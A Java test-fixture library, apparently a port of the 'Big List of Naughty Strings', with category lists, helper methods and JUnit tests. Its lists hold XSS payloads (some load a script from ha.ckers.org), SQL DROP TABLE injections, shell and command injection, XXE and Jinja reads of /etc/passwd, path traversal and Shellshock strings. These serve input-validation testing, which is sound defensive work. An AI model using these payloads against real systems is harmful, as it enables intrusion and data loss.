REGIONAL_INDICATOR_SYMBOLS = Arrays.asList( 211 | "🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸", 212 | "🇺🇸🇷🇺🇸🇦🇫🇦🇲", 213 | "🇺🇸🇷🇺🇸🇦" 214 | ); 215 | static List UNICODE_NUMBERS = Arrays.asList( 216 | "123", 217 | "١٢٣" 218 | ); 219 | static List RIGHT_TO_LEFT_STRINGS = Arrays.asList( 220 | "ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.", 221 | "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ", 222 | "הָיְתָהtestالصفحات التّحول", 223 | "﷽", 224 | "ﷺ", 225 | "مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، " 226 | ); 227 | static List OGHAM_TEXT = Arrays.asList( 228 | "Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣", 229 | "̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰", 230 | "̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟", 231 | "̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕", 232 | "Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮" 233 | ); 234 | static List UNICODE_UPSIDE_DOWN = Arrays.asList( 235 | "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥", 236 | "00˙Ɩ$-" 237 | ); 238 | static List UNICODE_FONT = Arrays.asList( 239 | "The quick brown fox jumps over the lazy dog", 240 | "𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠", 241 | "𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌", 242 | "𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 
𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈", 243 | "𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰", 244 | "𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘", 245 | "𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐", 246 | "⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢" 247 | ); 248 | static List SCRIPT_INJECTION = Arrays.asList( 249 | "", 250 | "<script>alert('123');</script>", 251 | "", 252 | "", 253 | "\">", 254 | "'>", 255 | ">", 256 | "", 257 | "< / script >< script >alert(123)< / script >", 258 | " onfocus=JaVaSCript:alert(123) autofocus", 259 | "\" onfocus=JaVaSCript:alert(123) autofocus", 260 | "' onfocus=JaVaSCript:alert(123) autofocus", 261 | "<script>alert(123)</script>", 262 | "ript>alert(123)ript>", 263 | "-->", 264 | "\";alert(123);t=\"", 265 | "';alert(123);t='", 266 | "JavaSCript:alert(123)", 267 | ";alert(123);", 268 | "src=JaVaSCript:prompt(132)", 269 | "\"><\\x3Cscript>javascript:alert(1)", 282 | "'`\"><\\x00script>javascript:alert(1)", 283 | "ABC
DEF", 284 | "ABC
DEF", 285 | "ABC
DEF", 286 | "ABC
DEF", 287 | "ABC
DEF", 288 | "ABC
DEF", 289 | "ABC
DEF", 290 | "ABC
DEF", 291 | "ABC
DEF", 292 | "ABC
DEF", 293 | "ABC
DEF", 294 | "ABC
DEF", 295 | "ABC
DEF", 296 | "ABC
DEF", 297 | "ABC
DEF", 298 | "ABC
DEF", 299 | "ABC
DEF", 300 | "ABC
DEF", 301 | "ABC
DEF", 302 | "ABC
DEF", 303 | "ABC
DEF", 304 | "ABC
DEF", 305 | "ABC
DEF", 306 | "ABC
DEF", 307 | "ABC
DEF", 308 | "ABC
DEF", 309 | "ABC
DEF", 310 | "test", 311 | "test", 312 | "test", 313 | "test", 314 | "test", 315 | "test", 316 | "test", 317 | "test", 318 | "test", 319 | "test", 320 | "test", 321 | "test", 322 | "test", 323 | "test", 324 | "test", 325 | "test", 326 | "test", 327 | "test", 328 | "test", 329 | "test", 330 | "test", 331 | "test", 332 | "test", 333 | "test", 334 | "test", 335 | "test", 336 | "test", 337 | "test", 338 | "test", 339 | "test", 340 | "test", 341 | "test", 342 | "test", 343 | "test", 344 | "test", 345 | "test", 346 | "test", 347 | "test", 348 | "test", 349 | "test", 350 | "test", 351 | "test", 352 | "test", 353 | "test", 354 | "test", 355 | "test", 356 | "test", 357 | "test", 358 | "test", 359 | "test", 360 | "test", 361 | "test", 362 | "test", 363 | "test", 364 | "test", 365 | "test", 366 | "test", 367 | "`\"'>", 368 | "`\"'>", 369 | "`\"'>", 370 | "`\"'>", 371 | "`\"'>", 372 | "`\"'>", 373 | "`\"'>", 374 | "`\"'>", 375 | "`\"'>", 376 | "`\"'>", 377 | "\"`'>", 378 | "\"`'>", 379 | "\"`'>", 380 | "\"`'>", 381 | "\"`'>", 382 | "\"`'>", 383 | "\"`'>", 384 | "\"`'>", 385 | "\"`'>", 386 | "\"`'>", 387 | "\"`'>", 388 | "\"`'>", 389 | "\"`'>", 390 | "\"`'>", 391 | "\"`'>", 392 | "\"`'>", 393 | "\"`'>", 394 | "\"`'>", 395 | "\"`'>", 396 | "\"`'>", 397 | "\"`'>", 398 | "\"`'>", 399 | "\"`'>", 400 | "\"`'>", 401 | "\"`'>", 402 | "\"`'>", 403 | "\"`'>", 404 | "\"`'>", 405 | "\"`'>", 406 | "\"`'>", 407 | "\"`'>", 408 | "\"`'>", 409 | "\"`'>", 410 | "\"`'>", 411 | "\"`'>", 412 | "\"`'>", 413 | "\"`'>", 414 | "", 415 | "", 416 | "", 417 | "", 418 | "", 419 | "", 420 | "", 421 | "", 422 | "", 423 | "", 424 | "", 425 | "", 426 | "", 427 | "", 428 | "", 429 | "", 430 | "", 431 | "", 432 | "", 433 | "", 434 | "", 435 | "", 436 | "", 437 | "", 438 | "", 439 | "", 440 | "", 441 | "", 442 | "", 443 | "", 444 | "", 445 | "", 446 | "", 447 | "", 448 | "XXX", 449 | "javascript:alert(1)\"` `>", 450 | "", 451 | "", 452 | "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x 
onerror=javascript:alert(1)></a>\">", 453 | "<!--[if]><script>javascript:alert(1)</script -->", 454 | "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", 455 | "<script src=\"/\\%(jscript)s\"></script>", 456 | "<script src=\"\\\\%(jscript)s\"></script>", 457 | "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", 458 | "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", 459 | "<IMG SRC=# onmouseover=\"alert('xxs')\">", 460 | "<IMG SRC= onmouseover=\"alert('xxs')\">", 461 | "<IMG onmouseover=\"alert('xxs')\">", 462 | "<IMG SRC=javascript:alert('XSS')>", 463 | "<IMG SRC=javascript:alert('XSS')>", 464 | "<IMG SRC=javascript:alert('XSS')>", 465 | "<IMG SRC=\"jav ascript:alert('XSS');\">", 466 | "<IMG SRC=\"jav ascript:alert('XSS');\">", 467 | "<IMG SRC=\"jav ascript:alert('XSS');\">", 468 | "<IMG SRC=\"jav ascript:alert('XSS');\">", 469 | "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out", 470 | "<IMG SRC=\"  javascript:alert('XSS');\">", 471 | "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", 472 | "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", 473 | "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", 474 | "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", 475 | "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", 476 | "<SCRIPT SRC=//ha.ckers.org/.j>", 477 | "<IMG SRC=\"javascript:alert('XSS')\"", 478 | "<iframe src=http://ha.ckers.org/scriptlet.html <", 479 | "\\\";alert('XSS');//", 480 | "<u oncopy=alert()> Copy me</u>", 481 | "<i onwheel=alert(1)> Scroll over me </i>", 482 | "<plaintext>", 483 | "http://a/%%30%30", 484 | "</textarea><script>alert(123)</script>" 485 | ); 486 | static List<String> SQL_INJECTION = Arrays.asList( 487 | "1;DROP TABLE users", 488 | "1'; DROP TABLE users-- 1", 489 | "' OR 1=1 -- 1", 490 | "' OR '1'='1", 491 | "'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --", 492 | " ", 493 | "%", 494 | "_" 495 | ); 496 | static List<String> SERVER_CODE_INJECTION = Arrays.asList( 497 | "-", 498 | "--", 499 | 
"--version", 500 | "--help", 501 | "$USER", 502 | "/dev/null; touch /tmp/blns.fail ; echo", 503 | "`touch /tmp/blns.fail`", 504 | "$(touch /tmp/blns.fail)", 505 | "@{[system \"touch /tmp/blns.fail\"]}" 506 | ); 507 | static List<String> COMMAND_INJECTION = Arrays.asList( 508 | "eval(\"puts 'hello world'\")", 509 | "System(\"ls -al /\")", 510 | "`ls -al /`", 511 | "Kernel.exec(\"ls -al /\")", 512 | "Kernel.exit(1)", 513 | "%x('ls -al /')" 514 | ); 515 | static List<String> XXE_INJECTION = Arrays.asList( 516 | "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>" 517 | ); 518 | static List<String> UNWANTED_INTERPOLATION = Arrays.asList( 519 | "$HOME", 520 | "$ENV{'HOME'}", 521 | "%d", 522 | "%s%s%s%s%s", 523 | "{0}", 524 | "%*.*s", 525 | "%@", 526 | "%n", 527 | "File:///" 528 | ); 529 | static List<String> FILE_INCLUSION = Arrays.asList( 530 | "../../../../../../../../../../../etc/passwd%00", 531 | "../../../../../../../../../../../etc/hosts" 532 | ); 533 | static List<String> CVES_AND_VULNERABILITIES = Arrays.asList( 534 | "() { 0; }; touch /tmp/blns.shellshock1.fail;", 535 | "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", 536 | "<<< %s(un='%s') = %u", 537 | "+++ATH0" 538 | ); 539 | static List<String> WINDOWS_SPECIAL_FILENAMES = Arrays.asList( 540 | "CON", 541 | "PRN", 542 | "AUX", 543 | "CLOCK$", 544 | "NUL", 545 | "A:", 546 | "ZZ:", 547 | "COM1", 548 | "LPT1", 549 | "LPT2", 550 | "LPT3", 551 | "COM2", 552 | "COM3", 553 | "COM4" 554 | ); 555 | static List<String> IRC_SPECIFIC_STRINGS = Arrays.asList( 556 | "DCC SEND STARTKEYLOGGER 0 0 0" 557 | ); 558 | static List<String> SCUNTHORPE_PROBLEM = Arrays.asList( 559 | "Scunthorpe General Hospital", 560 | "Penistone Community Church", 561 | "Lightwater Country Park", 562 | "Jimmy Clitheroe", 563 | "Horniman Museum", 564 | "shitake mushrooms", 565 | "RomansInSussex.co.uk", 566 | "http://www.cum.qc.ca/", 567 | "Craig 
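Cockburn, Software Specialist",
            "Linda Callahan",
            "Dr. Herman I. Libshitz",
            "magna cum laude",
            "Super Bowl XXX",
            "medieval erection of parapets",
            "evaluate",
            "mocha",
            "expression",
            "Arsenal canal",
            "classic",
            "Tyson Gay",
            "Dick Van Dyke",
            "basement"
    );
    // Free text addressed to whoever reads the stored value later (a log, a ticket, a report),
    // not to a parser.
    static List<String> HUMAN_INJECTION = Arrays.asList(
            "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you."
    );
    // ANSI escape sequences (ESC [ ...), backspaces and BEL characters. Code that prints stored
    // input to a terminal or log viewer should escape or strip control characters first;
    // otherwise the data itself can recolour, hide or overwrite what the operator sees.
    static List<String> TERMINAL_ESCAPE_CODES = Arrays.asList(
            "Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue",
            "But now...\u001b[20Cfor my greatest trick...\u001b[8m",
            "The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]"
    );
    // Unicode sequences grouped under "iOS vulnerabilities"; useful as regression input for
    // text layout and rendering code in general.
    static List<String> IOS_VULNERABILITIES = Arrays.asList(
            "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗",
            "🏳0🌈️",
            "జ్ఞ‌ా"
    );
    static List<String> PERSIAN_SPECIAL_CHARACTERS = Arrays.asList(
            "گچپژ"
    );
    // Template expressions: the first asks the engine to build a very large string, the second
    // walks Python object internals to read /etc/passwd. User input must reach a template as
    // data, never as template source; a rendered value that differs from the literal input
    // means the input was evaluated.
    static List<String> JINJA_2_INJECTION = Arrays.asList(
            "{% print 'x' * 64 * 1024**3 %}",
            "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}"
    );

    // Built once at class initialisation; must stay below every category list it concatenates.
    static List<String> ALL = getAllStringList();

    /**
     * Picks {@code size} strings at random, with replacement, from one category.
     *
     * <p>Because picks are made with replacement, {@code size} may exceed the number of strings
     * in the category and the result may contain duplicates. Selection uses an unseeded
     * {@link Random}: this is test-fixture sampling, not secret generation, so a cryptographic
     * generator is not needed, but runs are not reproducible. Record the returned strings when
     * a test fails so the failing input can be replayed.
     *
     * @param size number of strings to return; must not be negative
     * @param type category to draw from; must not be {@code null}
     * @return a new list holding exactly {@code size} strings of {@code type}
     * @throws IllegalArgumentException if {@code size} is negative, {@code type} is
     *         {@code null}, or the category holds no strings
     */
    static List<String> getRandomStrings(int size, NaughtyStrings type) {
        if (size < 0) {
            throw new IllegalArgumentException("Size cannot be negative");
        }
        if (type == null) {
            throw new IllegalArgumentException("Invalid Naughty Strings Type");
        }

        List<String> pool = type.getString();
        if (pool.isEmpty()) {
            // Random.ints(origin, bound) rejects an empty range with a message about bounds;
            // fail with the same exception type but say what is actually wrong.
            throw new IllegalArgumentException("No strings available for type " + type);
        }

        // A sized stream replaces the infinite stream + limit(size) pair.
        return new Random().ints(size, 0, pool.size())
                .mapToObj(pool::get)
                .collect(Collectors.toList());
    }

    /**
     * Returns every string of one category.
     *
     * @param type category to read; must not be {@code null}
     * @return the list held by {@code type}
     * @throws IllegalArgumentException if {@code type} is {@code null}
     */
    static List<String> getStrings(NaughtyStrings type) {
        if (type == null) {
            throw new IllegalArgumentException("Invalid Naughty Strings Type");
        }
        return type.getString();
    }

    /**
     * Concatenates the given lists, in argument order, into a new list.
     *
     * <p>The varargs array is only read, never stored or exposed, which is what
     * {@code @SafeVarargs} asserts; unlike {@code @SuppressWarnings("unchecked")} it also
     * silences the generic-array warning at every call site.
     *
     * @param lists lists to concatenate
     * @param <T> element type
     * @return a new mutable list with all elements of {@code lists}
     */
    @SafeVarargs
    public static <T> List<T> join(List<T>... lists) {
        List<T> result = new ArrayList<>();
        for (List<T> list : lists) {
            result.addAll(list);
        }
        return result;
    }

    /**
     * Builds a fresh list holding the strings of every category, in declaration order.
     *
     * @return a new list; changing it does not affect the category lists
     */
    public static List<String> getAllStringList() {
        return join(RESERVED_STRINGS, NUMERIC_STRINGS, SPECIAL_CHARACTERS,
                UNICODE_SYMBOLS, UNICODE_SUBSCRIPT_SUPERSCRIPT_ACCENTS, QUOTATION_MARKS, TWO_BYTE_CHARACTERS, TWO_BYTE_LETTER, SPECIAL_UNICODE_CHARACTERS_UNION,
                CHANGING_LENGTH_WHEN_LOWERCASE, JAPANESE_EMOTICONS, EMOJI, REGIONAL_INDICATOR_SYMBOLS, UNICODE_NUMBERS, RIGHT_TO_LEFT_STRINGS, OGHAM_TEXT,
                UNICODE_UPSIDE_DOWN, UNICODE_FONT, SCRIPT_INJECTION, SQL_INJECTION, SERVER_CODE_INJECTION, COMMAND_INJECTION, XXE_INJECTION, UNWANTED_INTERPOLATION,
                FILE_INCLUSION, CVES_AND_VULNERABILITIES, WINDOWS_SPECIAL_FILENAMES, IRC_SPECIFIC_STRINGS, SCUNTHORPE_PROBLEM, HUMAN_INJECTION, TERMINAL_ESCAPE_CODES,
                IOS_VULNERABILITIES, PERSIAN_SPECIAL_CHARACTERS, JINJA_2_INJECTION);
    }
}

--------------------------------------------------------------------------------
/src/main/java/io/github/nowshad/NaughtyStrings.java:
--------------------------------------------------------------------------------
package io.github.nowshad;

import java.util.Collections;
import java.util.List;

/**
 * Categories of naughty strings. Each constant exposes the strings of its category through
 * {@link #getString()}; {@link #ALL} exposes the concatenation of every category.
 */
public enum NaughtyStrings {
    RESERVED_STRINGS(BLNSInternal.RESERVED_STRINGS),
    NUMERIC_STRINGS(BLNSInternal.NUMERIC_STRINGS),
    SPECIAL_CHARACTERS(BLNSInternal.SPECIAL_CHARACTERS),
    UNICODE_SYMBOLS(BLNSInternal.UNICODE_SYMBOLS),
    UNICODE_SUBSCRIPT_SUPERSCRIPT_ACCENTS(BLNSInternal.UNICODE_SUBSCRIPT_SUPERSCRIPT_ACCENTS),
    QUOTATION_MARKS(BLNSInternal.QUOTATION_MARKS),
    TWO_BYTE_CHARACTERS(BLNSInternal.TWO_BYTE_CHARACTERS),
    TWO_BYTE_LETTER(BLNSInternal.TWO_BYTE_LETTER),
    SPECIAL_UNICODE_CHARACTERS_UNION(BLNSInternal.SPECIAL_UNICODE_CHARACTERS_UNION),
    CHANGING_LENGTH_WHEN_LOWERCASE(BLNSInternal.CHANGING_LENGTH_WHEN_LOWERCASE),
    JAPANESE_EMOTICONS(BLNSInternal.JAPANESE_EMOTICONS),
    EMOJI(BLNSInternal.EMOJI),
    REGIONAL_INDICATOR_SYMBOLS(BLNSInternal.REGIONAL_INDICATOR_SYMBOLS),
    UNICODE_NUMBERS(BLNSInternal.UNICODE_NUMBERS),
    RIGHT_TO_LEFT_STRINGS(BLNSInternal.RIGHT_TO_LEFT_STRINGS),
    OGHAM_TEXT(BLNSInternal.OGHAM_TEXT),
    UNICODE_UPSIDE_DOWN(BLNSInternal.UNICODE_UPSIDE_DOWN),
    UNICODE_FONT(BLNSInternal.UNICODE_FONT),
    SCRIPT_INJECTION(BLNSInternal.SCRIPT_INJECTION),
    SQL_INJECTION(BLNSInternal.SQL_INJECTION),
    SERVER_CODE_INJECTION(BLNSInternal.SERVER_CODE_INJECTION),
    COMMAND_INJECTION(BLNSInternal.COMMAND_INJECTION),
    XXE_INJECTION(BLNSInternal.XXE_INJECTION),
    UNWANTED_INTERPOLATION(BLNSInternal.UNWANTED_INTERPOLATION),
    FILE_INCLUSION(BLNSInternal.FILE_INCLUSION),
    CVES_AND_VULNERABILITIES(BLNSInternal.CVES_AND_VULNERABILITIES),
    WINDOWS_SPECIAL_FILENAMES(BLNSInternal.WINDOWS_SPECIAL_FILENAMES),
    IRC_SPECIFIC_STRINGS(BLNSInternal.IRC_SPECIFIC_STRINGS),
    SCUNTHORPE_PROBLEM(BLNSInternal.SCUNTHORPE_PROBLEM),
    HUMAN_INJECTION(BLNSInternal.HUMAN_INJECTION),
    TERMINAL_ESCAPE_CODES(BLNSInternal.TERMINAL_ESCAPE_CODES),
    IOS_VULNERABILITIES(BLNSInternal.IOS_VULNERABILITIES),
    PERSIAN_SPECIAL_CHARACTERS(BLNSInternal.PERSIAN_SPECIAL_CHARACTERS),
    JINJA_2_INJECTION(BLNSInternal.JINJA_2_INJECTION),
    ALL(BLNSInternal.ALL);

    // Read-only view: the lists are shared by every caller in the JVM, so one test replacing
    // an element would silently change the input of every later test.
    private final List<String> items;

    NaughtyStrings(List<String> items) {
        this.items = Collections.unmodifiableList(items);
    }

    /**
     * Returns the strings of this category.
     *
     * @return an unmodifiable view; copy it (for example {@code new ArrayList<>(...)}) before
     *         sorting or shuffling
     */
    public List<String> getString() {
        return items;
    }
}

--------------------------------------------------------------------------------
/src/test/java/io/github/nowshad/BLNSInternalTest.java:
--------------------------------------------------------------------------------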
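package io.github.nowshad;

import org.junit.jupiter.api.Test;

import java.util.List;

import static org.junit.jupiter.api.Assertions.*;

/**
 * Tests for the package-private helpers in {@link BLNSInternal}.
 */
class BLNSInternalTest {

    @Test
    void testGetRandomStrings_whenEmptyList_shouldReturnEmptyList() {
        List<String> results = BLNSInternal.getRandomStrings(0, NaughtyStrings.ALL);
        assertTrue(results.isEmpty());
    }

    @Test
    void testGetRandomStrings_whenSingleItemList_shouldReturnSingleItemList() {
        List<String> result = BLNSInternal.getRandomStrings(1, NaughtyStrings.ALL);
        assertFalse(result.isEmpty());
        assertEquals(1, result.size());
    }

    @Test
    void testGetRandomStrings_whenNegativeSize_shouldThrowError() {
        assertThrows(IllegalArgumentException.class, () -> BLNSInternal.getRandomStrings(-1, NaughtyStrings.ALL));
    }

    // Requests more strings than the category holds: picks are made with replacement, so the
    // size must still match and nothing from another category may leak in.
    @Test
    void testGetRandomStrings_whenSizeExceedsCategory_shouldReturnOnlyStringsOfThatCategory() {
        List<String> category = NaughtyStrings.SQL_INJECTION.getString();
        List<String> results = BLNSInternal.getRandomStrings(50, NaughtyStrings.SQL_INJECTION);
        assertEquals(50, results.size());
        assertTrue(category.containsAll(results));
    }

    @Test
    void testGetStrings_whenReservedType_shouldReturnReservedItems() {
        List<String> expectedList = NaughtyStrings.RESERVED_STRINGS.getString();
        List<String> actualList = BLNSInternal.getStrings(NaughtyStrings.RESERVED_STRINGS);
        assertIterableEquals(expectedList, actualList);
    }

    @Test
    void testGetStrings_whenReservedType_shouldReturnListOfStrings() {
        List<String> reservedList = BLNSInternal.getStrings(NaughtyStrings.RESERVED_STRINGS);
        assertFalse(reservedList.isEmpty());
    }

    @Test
    void testGetStrings_whenAllStringType_shouldReturnAllStrings() {
        List<String> allStrings = BLNSInternal.getAllStringList();
        assertIterableEquals(allStrings, BLNSInternal.getStrings(NaughtyStrings.ALL));
    }
}

--------------------------------------------------------------------------------
/src/test/java/io/github/nowshad/BLNSTest.java:
--------------------------------------------------------------------------------
package io.github.nowshad;

import org.junit.jupiter.api.Test;

import java.util.List;

import static org.junit.jupiter.api.Assertions.*;

/**
 * Tests for the public {@link BLNS} facade. The internal lists are the reference
 * ("expected") and the facade's return value is the value under test ("actual"), so a
 * failure report names the two sides correctly.
 *
 * @author Nowshad Hasan
 * @since 30/7/22 7:52 am
 */
public class BLNSTest {

    @Test
    void testGetRandomList_whenSizeGreaterThanZero_shouldReturnGreaterThanZeroList() {
        List<String> randomList = BLNS.getRandomList(10, NaughtyStrings.CHANGING_LENGTH_WHEN_LOWERCASE);
        assertFalse(randomList.isEmpty());
    }

    @Test
    void testGetRandomList_whenSizeLessThanZero_shouldThrowError() {
        assertThrows(IllegalArgumentException.class, () -> BLNS.getRandomList(-20, NaughtyStrings.REGIONAL_INDICATOR_SYMBOLS));
    }

    @Test
    void testGetRandomList_whenTypeIsNull_shouldThrowError() {
        assertThrows(IllegalArgumentException.class, () -> BLNS.getRandomList(20, null));
    }

    @Test
    void testGetList_whenNull_shouldThrowError() {
        assertThrows(IllegalArgumentException.class, () -> BLNS.getList(null));
    }

    @Test
    void testGetList_whenAllString_shouldReturnAllStrings() {
        List<String> expectedList = BLNSInternal.getAllStringList();
        List<String> actualList = BLNS.getList(NaughtyStrings.ALL);
        assertIterableEquals(expectedList, actualList);
    }

    @Test
    void testGetList_whenReservedString_shouldReturnReservedStrings() {
        List<String> expectedList = BLNSInternal.getStrings(NaughtyStrings.RESERVED_STRINGS);
        List<String> actualList = BLNS.getList(NaughtyStrings.RESERVED_STRINGS);
        assertIterableEquals(expectedList, actualList);
    }

    @Test
    void testGetList_whenRegionalIndicatorSymbols_shouldReturnRegionalIndicatorSymbols() {
        List<String> expectedList = BLNSInternal.getStrings(NaughtyStrings.REGIONAL_INDICATOR_SYMBOLS);
        List<String> actualList = BLNS.getList(NaughtyStrings.REGIONAL_INDICATOR_SYMBOLS);
        assertIterableEquals(expectedList, actualList);
    }

    @Test
    void testGetList_whenJapaneseEmoticons_shouldReturnJapaneseEmoticons() {
        List<String> expectedList = BLNSInternal.getStrings(NaughtyStrings.JAPANESE_EMOTICONS);
        List<String> actualList = BLNS.getList(NaughtyStrings.JAPANESE_EMOTICONS);
        assertIterableEquals(expectedList, actualList);
    }
}

--------------------------------------------------------------------------------
/src/test/java/io/github/nowshad/NaughtyStringsTest.java:
--------------------------------------------------------------------------------
package io.github.nowshad;

import org.junit.jupiter.api.Test;

import java.util.List;

import static org.junit.jupiter.api.Assertions.assertIterableEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;

/**
 * Tests that the {@link NaughtyStrings} constants expose the lists they were built from.
 *
 * @author Nowshad Hasan
 * @since 29/7/22 2:04 pm
 */
public class NaughtyStringsTest {

    @Test
    void testNumericString_whenNumericString_shouldReturnNumericStringList() {
        // The enum is the unit under test; the internal list is the reference.
        List<String> expectedList = BLNSInternal.NUMERIC_STRINGS;
        List<String> actualList = NaughtyStrings.NUMERIC_STRINGS.getString();
        assertIterableEquals(expectedList, actualList);
    }

    @Test
    void testSpecialCharacters_whenSpecialCharacters_shouldReturnGreaterThanZeroList() {
        List<String> specialCharacters = NaughtyStrings.SPECIAL_CHARACTERS.getString();
        assertTrue(specialCharacters.size() > 0);
    }
}

--------------------------------------------------------------------------------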